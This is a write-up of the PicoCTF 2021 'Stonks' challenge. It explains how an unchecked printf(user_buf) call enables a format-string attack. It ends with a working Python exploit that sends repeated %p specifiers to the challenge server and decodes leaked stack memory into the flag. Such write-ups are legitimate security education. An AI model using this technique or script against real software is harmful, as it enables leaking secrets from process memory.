Preamble

The Stonks problem was a binary exploitation problem set out by the PicoCTF 2021 competition. This problem featured a variety of techniques that I hadn’t used before and introduced me to some new tools to consider in the future.

The problem may be accessed here for those interested.

This problem provided a source code file - vuln.c - and a compiled version accessible via netcat. Ultimately, as the attacker we are meant to evaluate the source code to identify a vulnerability; once the vulnerability is discovered, we should exploit it on the compiled version in order to achieve the flag (format: picoCTF{…}).

As a C-language program file, the program initiates at the main() function. In looking at main(), we note that the user is prompted to make an option of either “1” or “2”, invoking the buy_stonks() or view_portfolio() functions, respectively. I noted at this juncture that user input is (somewhat) sanitized; entering anything other than “1” or “2” simply exits the program.

Of the two potential functions to be invoked, buy_stonks() was the more interesting (as the latter simply output some information that we - as the attacker - had no control over). The buy_stonks() function was as follows:

int buy_stonks(Portfolio *p) {
	if (!p) {
		return 1;
	}
	char api_buf[FLAG_BUFFER];
	FILE *f = fopen("api","r");
	if (!f) {
		printf("Flag file not found. Contact an admin.\n");
		exit(1);
	}
	fgets(api_buf, FLAG_BUFFER, f);

	int money = p->money;
	int shares = 0;
	Stonk *temp = NULL;
	printf("Using patented AI algorithms to buy stonks\n");
	while (money > 0) {
		shares = (rand() % money) + 1;
		temp = pick_symbol_with_AI(shares);
		temp->next = p->head;
		p->head = temp;
		money -= shares;
	}
	printf("Stonks chosen\n");

	// TODO: Figure out how to read token from file, for now just ask

	char *user_buf = malloc(300 + 1);
	printf("What is your API token?\n");
	scanf("%300s", user_buf);
	printf("Buying stonks with token:\n");
	printf(user_buf);

	// TODO: Actually use key to interact with API

	view_portfolio(p);

	return 0;
}

At a glance, I can infer the following:

The compiled version of the program is reading in a file that likely contains the flag (lines 5-9).
The user is prompted a second time for input (lines 28-32), with their input stored into variable user_buf

At first, I thought to attempt a buffer overflow; this, however, would not work as the scanf() function caps what’s read in from the user as 300 chars.

At this point, I could not identify (through my own experience) where another vulnerability may have existed. To that end, I turned to a static code analyzer, Flawedfinder. Flawedfinder is a simple program that scans C/C++ source code and reports potential security flaws. By running flawedfinder vuln.c, we note the following amongst the output:

Flawedfinder outputs a number of entries, categorizing each entry as a potential vulnerability from 1 to 5 (with 5 being the most vulnerable). In the case of vuln.c, there are 2 level-4 vulnerabilities reported.

If we look at the first vulnerability reported, CWE-78 is a command injection vulnerability (i.e. passing bash commands to system() in order to achieve command execution). In the referenced code block, the system() call invokes date, which in the Linux command line returns the current date. Since we have no control over what is entered into the system() call, this vulnerability does not appear to be exploitable.

The second vulnerability reported is CWE-134, which is a vulnerability that can lead to buffer overflows or data representation problems.

A *printf() call without a format specifier is dangerous and can be exploited. For example, printf(input); is exploitable, while printf(y, input); is not exploitable in that context. The result of the first call, used incorrectly, allows for an attacker to be able to peek at stack memory since the input string will be used as the format specifier. The attacker can stuff the input string with format specifiers and begin reading stack values, since the remaining parameters will be pulled from the stack. Worst case, this improper use may give away enough control to allow an arbitrary value (or values in the case of an exploit program) to be written into the memory of the running program.

In essence, the printf() call is meant to format what’s being output. For example: printf(“%d”, someInteger) explicitly stipulates that the value from someInteger will be formatted and printed as an integer (”%d”). OWASP demonstrates that it is possible to retrieve memory from the program Stack by placing certain variables in the printf() call, such as %s, %x, and %p. For a quick refresher on what is the Stack, see the following:

Since we do have control of what goes into user_buf, we can see if the program leaks information by injecting into it.

True enough, when I pass a value as simple as %x, some kind of (potentially hex) value returns. (NOTE: in the snapshot below, I use a python script to help automate my test calls; the final POC code will be provided below).

With the vulnerability confirmed as exploitable, my goal now was to determine what could be done with it.

Based on my understanding of the call stack (again, see video above), the contents of the flag file should still be residing in memory at the time that the printf() statement is run. This means that we can print it, if only we can find it.

Fortunately, as the OWASP article points out, calling %x or %p multiple times moves the pointer on throughout the Stack. Therefore, if we call it enough times and try to convert the (presumably hexadecimal) values to ASCII text, we might discover it. This works (somewhat) when we try passing %x several dozen times and use a hex-to-ASCII converter:

In the snapshot above, we do see what appears to be the makings of a flag, but it is somewhat jumbled. This, as it turns out, is the result of endianness. In brief, endianness (either “big” or “little”) refers to the order in which bytes are stored into memory; a big-endian system stores the most significant byte at the smallest memory address and the least significant byte at the largest (and little-endian, vice versa).

In our case, it would appear we need to convert the endianness from little to big. While at this point it is totally possible to sort the characters appropriately by hand ourselves; in an effort to learn more (which is the whole point of working with PicoCTF) I sought to write my own python script. Fortunately, the python pwn module provides us the capability.

Below was my final POC code:

#!/usr/bin/env python3

import sys
import socket
import time
from pwn import *

#Initiate a socket connection to the compiled code
hostname = "mercury.picoctf.net"
port = 20195
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))

#Defined method to handle receiving response from the compiled code
def testrecv():
	res = ""
	while True:
		data = sock.recv(1024)
		if (not data):
			break
		res += data.decode()
	print(res)
	return res


resp = sock.recv(2048)
content = "1" + ("%p_" * 50)  # Trigger buy_stonks(), then submit a sequence of %p_$p_ entries
sock.send(content.encode())
time.sleep(0.2)
sock.shutdown(socket.SHUT_WR) # Signal to the compiled code that we are done writing
hexdump = testrecv()
print("Connection terminated")
sock.close()

#Because we used "_" between pointer calls, we can use them to parse the
#response from the server.
hexlist = hexdump.split('_')

print("Starting loop")
ans = b""
#Each entry is formatted in hex
#Example: 0x01238F2A
for entry in hexlist:
	try:
		hex_string = entry[2:]	#strip off 0x
		hex_str = int(hex_string, 16) #convert to an int; needed for p32()
		test = p32(hex_str) #change from little to big endian
		ans += test
	except:
		#print("ENTRY: " + entry)
		continue
        
#Make the output more readable to find the flag
idx_start = ans.find(b'pico')
idx_end = ans.find(b'}') + 1
print(ans[idx_start:idx_end]) #outputs: b'picoCTF{I_l05t_4ll_my_m0n3y_6045d60d}'

PicoCTF 2021 Writeup: Stonks

A detailed writeup on the Stonks problem from PicoCTF 2021

Preamble

FEATURED TAGS

FRIENDS